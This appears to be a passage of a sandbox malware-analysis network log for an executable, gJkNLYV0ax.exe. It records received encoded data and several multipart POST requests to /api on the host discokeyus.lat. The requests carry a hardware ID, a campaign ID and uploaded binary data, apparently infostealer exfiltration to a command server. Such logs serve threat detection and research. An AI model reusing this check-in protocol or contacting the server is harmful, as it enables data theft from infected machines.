                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 65 54 6e 74 45 74 2b 41 2b 52 4f 51 79 47 55 67 57 46 69 38 39 31 54 47 4b 39 4d 77 2f 30 70 68 75 58 6a 77 6f 4b 33 39 6c 73 78 2b 4d 36 4a 4b 6e 4e 76 44 46 49 76 57 66 79 4a 47 56 50 76 67 45 39 68 6b 30 7a 53 35 48 53 4c 78 4f 72 36 69 74 72 4c 4a 6a 56 34 78 72 6b 6d 4c 33 74 70 51 6e 70 64 70 62 55 39 53 76 4c 42 61 32 57 58 56 4d 62 38 41 4b 62 70 2f 2b 37 65 6c 2b 35 7a 41 66 69 79 6e 52 5a 7a 54 7a 42 71 4c 31 6e 6f 70 52 56 50 36 36 42 71 66 4a 5a 51 37 70 31 4a 35 38 56 66 37 74 61 6e 2b 68 34 39 45 59 62 49 45 68 70 50 4d 48 4d 47 42 4d 43 56 4e 58 66 2f 6a 46 64 78 6a 33 79 36 2f 41 43 65 38 63 65 79 6a 71 2f 79 62 7a 6d 77 72 6f 30 79 63 32 73 41 5a 68 4e 35 30 62 51 59 65 2b 2f 42 61 68 79 76 31 4d 62 51 65 4b 36 5a 30 76 72 72 67 36 39 48
                                                                                                                                              Data Ascii: eTntEt+A+ROQyGUgWFi891TGK9Mw/0phuXjwoK39lsx+M6JKnNvDFIvWfyJGVPvgE9hk0zS5HSLxOr6itrLJjV4xrkmL3tpQnpdpbU9SvLBa2WXVMb8AKbp/+7el+5zAfiynRZzTzBqL1nopRVP66BqfJZQ7p1J58Vf7tan+h49EYbIEhpPMHMGBMCVNXf/jFdxj3y6/ACe8ceyjq/ybzmwro0yc2sAZhN50bQYe+/Bahyv1MbQeK6Z0vrrg69H
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 30 79 51 33 73 64 51 7a 35 6c 33 4e 51 67 47 76 4d 49 5a 79 32 6a 65 66 6f 6f 52 4c 37 39 7a 36 4f 57 78 76 49 69 4e 65 53 33 74 45 74 2f 65 79 68 69 48 79 33 38 67 53 31 44 79 35 78 2f 51 59 39 51 38 73 68 63 6c 75 6e 2f 39 71 4b 72 67 6d 38 31 32 4a 4b 78 41 6c 5a 4f 46 55 49 62 42 4d 48 55 49 62 2b 76 6a 57 4f 70 6f 32 6a 4b 34 42 47 47 75 4f 75 66 6c 71 66 37 52 6c 54 34 73 70 55 2b 61 33 4d 6f 61 6a 39 78 36 49 55 42 51 2f 2f 6f 56 32 32 76 59 4e 4c 55 66 4c 37 56 38 39 36 36 6c 39 4a 48 4d 64 47 48 6a 43 70 6a 4c 69 30 6a 42 37 58 63 68 52 56 47 2b 33 52 6e 52 5a 64 4d 71 2f 77 31 76 71 44 54 35 71 65 36 71 30 63 46 33 49 61 5a 41 6d 39 50 4d 48 59 54 61 64 79 35 46 57 66 62 6d 48 64 74 6e 33 54 47 35 45 69 61 31 63 65 79 67 70 2f 36 64 6a 54 42 68
                                                                                                                                              Data Ascii: 0yQ3sdQz5l3NQgGvMIZy2jefooRL79z6OWxvIiNeS3tEt/eyhiHy38gS1Dy5x/QY9Q8shclun/9qKrgm812JKxAlZOFUIbBMHUIb+vjWOpo2jK4BGGuOuflqf7RlT4spU+a3Moaj9x6IUBQ//oV22vYNLUfL7V8966l9JHMdGHjCpjLi0jB7XchRVG+3RnRZdMq/w1vqDT5qe6q0cF3IaZAm9PMHYTady5FWfbmHdtn3TG5Eia1ceygp/6djTBh
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 33 53 55 49 62 56 4d 48 55 49 56 2f 58 36 46 4e 46 69 32 54 71 33 46 53 2b 38 66 2f 69 75 71 66 57 58 77 48 59 73 71 45 6d 65 31 38 45 43 67 74 4a 36 49 45 49 65 73 71 67 64 78 79 75 4d 66 4a 67 65 43 4b 46 76 37 4c 50 75 37 64 2f 55 50 69 61 68 43 73 65 54 79 42 2b 49 31 6e 67 6c 52 31 48 34 35 68 7a 5a 5a 74 45 7a 74 51 41 70 76 33 6e 31 71 71 58 67 6b 63 42 36 4c 61 6c 43 6c 4e 6d 4c 58 73 48 65 61 47 30 51 48 73 6e 6c 46 64 39 6f 77 6e 79 67 58 44 6a 78 63 2f 4c 6c 39 72 4b 64 77 33 34 75 6f 55 61 55 32 38 6f 63 6a 39 35 31 4a 45 42 57 37 75 6b 65 31 32 72 61 4d 37 34 57 4a 4c 52 77 2b 61 47 6f 2f 64 47 44 50 69 61 31 43 73 65 54 35 44 65 30 6d 31 45 58 43 45 47 79 38 56 72 59 5a 35 52 6b 2f 78 34 69 76 58 7a 78 6f 36 66 2b 6d 38 52 31 4c 61 5a 4f 6b
                                                                                                                                              Data Ascii: 3SUIbVMHUIV/X6FNFi2Tq3FS+8f/iuqfWXwHYsqEme18ECgtJ6IEIesqgdxyuMfJgeCKFv7LPu7d/UPiahCseTyB+I1nglR1H45hzZZtEztQApv3n1qqXgkcB6LalClNmLXsHeaG0QHsnlFd9ownygXDjxc/Ll9rKdw34uoUaU28ocj951JEBW7uke12raM74WJLRw+aGo/dGDPia1CseT5De0m1EXCEGy8VrYZ5Rk/x4ivXzxo6f+m8R1LaZOk
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 4f 32 48 45 72 57 6c 6e 31 2b 68 54 53 5a 4e 77 30 74 68 4d 6c 74 48 6e 34 71 61 54 7a 6c 73 4e 77 4b 65 30 45 33 39 54 54 55 4e 6d 5a 55 54 31 54 54 4f 72 6c 4f 39 4a 6b 6c 43 50 78 43 32 47 32 65 4c 37 39 37 76 75 44 79 58 4d 7a 70 45 32 52 33 4d 67 43 67 4e 52 37 50 30 39 52 2b 4f 38 57 32 57 54 53 50 62 6f 59 4c 62 5a 78 39 61 71 69 73 74 2b 4e 65 54 6e 74 45 74 2f 39 77 41 4f 57 32 6e 34 6d 58 6b 57 38 39 31 54 47 4b 39 4d 77 2f 30 70 68 73 6e 2f 31 6f 61 37 2b 6b 63 6c 7a 49 62 39 46 6d 4e 54 43 47 35 50 54 64 79 70 44 56 76 66 6e 48 4d 31 6e 32 69 36 36 41 44 50 78 4f 72 36 69 74 72 4c 4a 6a 55 67 6d 76 56 71 63 6b 66 6f 47 67 73 39 37 49 45 51 65 34 36 59 44 6e 32 7a 59 66 4f 64 53 4a 37 35 39 2f 61 71 76 2b 35 33 41 65 79 69 6f 53 35 6e 58 77 52
                                                                                                                                              Data Ascii: O2HErWln1+hTSZNw0thMltHn4qaTzlsNwKe0E39TTUNmZUT1TTOrlO9JklCPxC2G2eL797vuDyXMzpE2R3MgCgNR7P09R+O8W2WTSPboYLbZx9aqist+NeTntEt/9wAOW2n4mXkW891TGK9Mw/0phsn/1oa7+kclzIb9FmNTCG5PTdypDVvfnHM1n2i66ADPxOr6itrLJjUgmvVqckfoGgs97IEQe46YDn2zYfOdSJ759/aqv+53AeyioS5nXwR
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 62 56 63 51 35 61 67 64 30 79 75 4d 66 4c 77 56 49 72 42 2b 39 36 6d 68 39 5a 58 66 64 43 61 2f 53 35 37 59 78 68 79 42 31 48 30 6e 53 56 66 78 35 42 66 59 62 4e 73 35 2f 31 78 68 74 6d 79 2b 2f 65 37 54 6e 4d 5a 79 65 76 63 4b 67 4a 33 53 55 49 62 56 4d 48 55 49 58 76 62 74 45 4e 4a 6f 32 7a 2b 74 45 79 65 6a 64 50 4f 76 76 50 69 61 79 48 4d 73 6f 45 6d 5a 31 63 41 63 6b 39 42 77 4c 6b 4d 65 73 71 67 64 78 79 75 4d 66 4a 77 46 4e 37 74 7a 38 72 4f 6c 38 35 4c 62 63 7a 48 74 42 4e 2f 43 7a 41 48 42 67 57 59 39 58 31 6e 6a 70 67 4f 66 62 4e 68 38 35 31 49 6e 75 48 4c 35 6f 36 44 67 6c 4d 74 78 4c 71 52 44 6d 39 76 49 45 49 58 64 64 79 68 4c 55 76 66 76 47 64 42 76 33 54 4b 32 48 57 48 2f 4e 50 6d 39 37 71 72 52 37 47 55 69 6f 55 66 66 7a 49 55 4a 77 64 35
                                                                                                                                              Data Ascii: bVcQ5agd0yuMfLwVIrB+96mh9ZXfdCa/S57YxhyB1H0nSVfx5BfYbNs5/1xhtmy+/e7TnMZyevcKgJ3SUIbVMHUIXvbtENJo2z+tEyejdPOvvPiayHMsoEmZ1cAck9BwLkMesqgdxyuMfJwFN7tz8rOl85LbczHtBN/CzAHBgWY9X1njpgOfbNh851InuHL5o6DglMtxLqRDm9vIEIXddyhLUvfvGdBv3TK2HWH/NPm97qrR7GUioUffzIUJwd5
                                                                                                                                              2024-12-20 15:39:36 UTC261INData Raw: 72 79 77 57 76 39 67 77 6a 6d 34 42 47 4f 45 64 2f 43 72 71 65 54 52 30 6b 46 76 37 55 57 46 6b 35 4d 70 6d 4a 6c 33 49 51 67 47 76 50 30 64 33 32 7a 4f 4b 72 67 65 4d 4c 70 35 38 6f 65 68 39 59 66 4f 63 53 4b 38 51 39 50 59 78 6c 44 50 6d 58 63 31 43 41 61 38 78 78 33 4a 61 50 73 2f 72 68 74 68 2f 7a 54 35 73 2b 36 71 30 66 4d 2b 4d 36 35 61 6e 4e 7a 61 4c 73 47 42 61 52 4d 49 56 65 72 76 43 74 78 39 33 7a 47 7a 41 78 2f 78 4c 4b 72 33 2f 4b 44 44 6e 32 46 68 73 6e 58 52 6b 38 70 51 32 65 42 70 62 56 34 65 70 4c 70 55 6e 33 6d 55 5a 50 39 56 49 71 4e 6d 2b 4b 61 34 38 64 62 7a 51 41 61 37 51 4a 6a 44 7a 41 65 4f 6d 54 35 74 52 78 36 6b 30 56 72 57 62 4d 38 74 71 52 38 78 74 6a 54 42 36 2b 37 71 30 5a 55 2b 46 4b 35 45 6b 64 54 64 41 63 7a 2b 5a 69 64 50
                                                                                                                                              Data Ascii: rywWv9gwjm4BGOEd/CrqeTR0kFv7UWFk5MpmJl3IQgGvP0d32zOKrgeMLp58oeh9YfOcSK8Q9PYxlDPmXc1CAa8xx3JaPs/rhth/zT5s+6q0fM+M65anNzaLsGBaRMIVervCtx93zGzAx/xLKr3/KDDn2FhsnXRk8pQ2eBpbV4epLpUn3mUZP9VIqNm+Ka48dbzQAa7QJjDzAeOmT5tRx6k0VrWbM8tqR8xtjTB6+7q0ZU+FK5EkdTdAcz+ZidP
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 32 63 37 30 0d 0a 46 5a 38 6c 6c 44 72 2f 53 6e 4c 2f 4e 50 71 30 37 71 72 42 6e 79 56 30 2f 68 33 50 67 64 52 65 6d 4a 6c 6d 62 52 41 4d 73 71 67 49 6e 7a 4f 55 65 37 77 41 4d 37 64 33 36 4b 62 70 7a 4b 2f 71 5a 43 79 72 58 59 37 74 39 52 65 62 31 48 59 36 57 52 4c 70 36 78 54 52 62 4d 4a 38 38 56 49 75 38 53 7a 48 35 65 61 79 72 6f 4d 2b 4f 65 30 53 33 2b 62 49 48 6f 2f 65 5a 6a 77 46 65 65 62 6c 48 4d 68 36 6c 48 4c 2f 46 47 48 70 4a 4c 44 6c 71 75 50 52 6c 53 35 7a 39 68 2f 4d 68 4a 74 43 6e 70 64 70 62 56 34 65 70 4c 70 55 6e 33 6d 55 5a 50 39 56 49 71 4e 6d 2b 4b 61 34 38 64 62 7a 51 41 2b 71 54 4a 72 55 32 31 4b 76 30 6d 51 71 43 42 43 38 35 31 71 48 55 70 52 30 2f 79 31 76 38 57 79 2b 2f 65 37 48 6b 73 4e 77 4a 72 74 62 30 76 33 4d 46 6f 54 65 59
                                                                                                                                              Data Ascii: 2c70FZ8llDr/SnL/NPq07qrBnyV0/h3PgdRemJlmbRAMsqgInzOUe7wAM7d36KbpzK/qZCyrXY7t9Reb1HY6WRLp6xTRbMJ88VIu8SzH5eayroM+Oe0S3+bIHo/eZjwFeeblHMh6lHL/FGHpJLDlquPRlS5z9h/MhJtCnpdpbV4epLpUn3mUZP9VIqNm+Ka48dbzQA+qTJrU21Kv0mQqCBC851qHUpR0/y1v8Wy+/e7HksNwJrtb0v3MFoTeY
                                                                                                                                              2024-12-20 15:39:36 UTC1369INData Raw: 38 73 45 69 52 4b 38 5a 38 35 31 4a 6d 73 6d 62 73 6f 36 33 6b 6b 6f 70 41 48 34 70 45 6d 4e 4c 64 41 4a 62 57 50 77 4e 2b 66 38 4c 57 44 39 78 6c 32 6a 75 70 41 32 48 2f 4e 50 48 6c 39 73 76 52 68 54 34 65 34 77 71 48 6b 35 4e 51 74 4e 70 2b 49 30 39 49 37 61 55 39 30 57 7a 56 4b 71 38 46 4c 76 35 61 79 49 54 75 76 4e 48 4c 50 6e 6e 2f 42 4e 2f 58 32 6c 44 5a 69 53 4a 32 48 51 32 72 75 45 6a 41 4a 63 31 38 71 56 4a 35 34 7a 71 2b 74 2b 36 71 30 59 70 39 4d 37 39 4d 6e 4d 58 49 56 37 2f 6e 56 79 4e 50 58 2b 72 34 46 39 4e 4b 31 79 32 31 4c 42 2b 6b 64 2f 43 72 71 65 53 41 6a 54 42 68 6f 67 72 48 36 6f 74 59 77 65 59 2b 62 56 41 65 70 4b 67 76 33 47 58 61 4f 36 6b 44 62 4a 5a 36 2b 61 53 34 34 70 7a 42 58 79 4b 38 51 4e 2b 64 69 78 62 42 67 53 4a 6a 43 46
                                                                                                                                              Data Ascii: 8sEiRK8Z851Jmsmbso63kkopAH4pEmNLdAJbWPwN+f8LWD9xl2jupA2H/NPHl9svRhT4e4wqHk5NQtNp+I09I7aU90WzVKq8FLv5ayITuvNHLPnn/BN/X2lDZiSJ2HQ2ruEjAJc18qVJ54zq+t+6q0Yp9M79MnMXIV7/nVyNPX+r4F9NK1y21LB+kd/CrqeSAjTBhogrH6otYweY+bVAepKgv3GXaO6kDbJZ6+aS44pzBXyK8QN+dixbBgSJjCF


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.449737104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:38 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=LI06XNEYW6Q
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 18121
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:38 UTC15331OUTData Raw: 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 49 30 36 58 4e 45 59 57 36 51 0d 0a 43 6f 6e 74
                                                                                                                                              Data Ascii: --LI06XNEYW6QContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--LI06XNEYW6QContent-Disposition: form-data; name="pid"2--LI06XNEYW6QContent-Disposition: form-data; name="lid"PsFKDg--pablo--LI06XNEYW6QCont
                                                                                                                                              2024-12-20 15:39:38 UTC2790OUTData Raw: 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52
                                                                                                                                              Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                                              2024-12-20 15:39:39 UTC1141INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:39 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=45lb0vbsmu2iier32v66471ull; expires=Tue, 15 Apr 2025 09:26:18 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CF%2F5tkimjBhc70w6nUYaGb%2BNWXwT%2Bb%2BySZHnXatWI3%2BpwIV2mMHu0ug%2FDltGuX7RX7r8uokerkKQl7GHMG8fzPZ%2B69V4%2FXehqLl%2BaXHjfaiVheqRuDDzBldnZqX75FSPpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b9ef2a1378e7-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1816&rtt_var=701&sent=13&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19074&delivery_rate=1538461&cwnd=234&unsent_bytes=0&cid=00c2176f7829ffeb&ts=982&x=0"
                                                                                                                                              2024-12-20 15:39:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-20 15:39:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              3192.168.2.449739104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:40 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=V1TMRKCAP
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 8730
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:40 UTC8730OUTData Raw: 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 56 31 54 4d 52 4b 43 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                              Data Ascii: --V1TMRKCAPContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--V1TMRKCAPContent-Disposition: form-data; name="pid"2--V1TMRKCAPContent-Disposition: form-data; name="lid"PsFKDg--pablo--V1TMRKCAPContent-Disp
                                                                                                                                              2024-12-20 15:39:41 UTC1132INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:41 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=63751th3akgkeajpuut1mo5llm; expires=Tue, 15 Apr 2025 09:26:20 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OUmQ2KEqTVON1A6L7nanFf3xFz4AGZhTWF%2FWAL2iAF1ReN9gYPlI%2BuoLDCTmvfiy6%2B%2Fzrg9RI41wBq3qP7z3ZahPTNWKpQ5ZbCoZ6xU5po1n%2BSvZ2%2FdFVhQIvCFotOvSFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50b9fd6ce14285-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1594&rtt_var=605&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9658&delivery_rate=1798029&cwnd=32&unsent_bytes=0&cid=d5af13200aa83d54&ts=830&x=0"
                                                                                                                                              2024-12-20 15:39:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                              2024-12-20 15:39:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              4192.168.2.449741104.21.21.994437308C:\Users\user\Desktop\gJkNLYV0ax.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-12-20 15:39:43 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: multipart/form-data; boundary=LVE2G100NVG
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 20395
                                                                                                                                              Host: discokeyus.lat
                                                                                                                                              2024-12-20 15:39:43 UTC15331OUTData Raw: 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4c 56 45 32 47 31 30 30 4e 56 47 0d 0a 43 6f 6e 74
                                                                                                                                              Data Ascii: --LVE2G100NVGContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--LVE2G100NVGContent-Disposition: form-data; name="pid"3--LVE2G100NVGContent-Disposition: form-data; name="lid"PsFKDg--pablo--LVE2G100NVGCont
                                                                                                                                              2024-12-20 15:39:43 UTC5064OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb
                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@
                                                                                                                                              2024-12-20 15:39:44 UTC1134INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 20 Dec 2024 15:39:44 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=opdcjoqa4vp2ap40b5usuukoe6; expires=Tue, 15 Apr 2025 09:26:23 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2aphFwAH%2F%2FSG4657L482V7IvLnIgCxqtYSz3rKHRlj3RrvAA32yOjAjEJvB%2B4ISbCOQ7CIuYcxoXvOZGbDRwWPaZDtQ%2Fi4e%2BSGQGUaJL2NBXjjVYxDh1OV0Hrl5Ck9RwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8f50ba0cc9b078d3-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1877&rtt_var=741&sent=19&recv=27&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21348&delivery_rate=1555673&cwnd=210&unsent_bytes=0&cid=be279c150c542fed&ts=1394&x=0"
                                                                                                                                              2024-12-20 15:39:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                              Data Ascii: fok 8.46.123.189
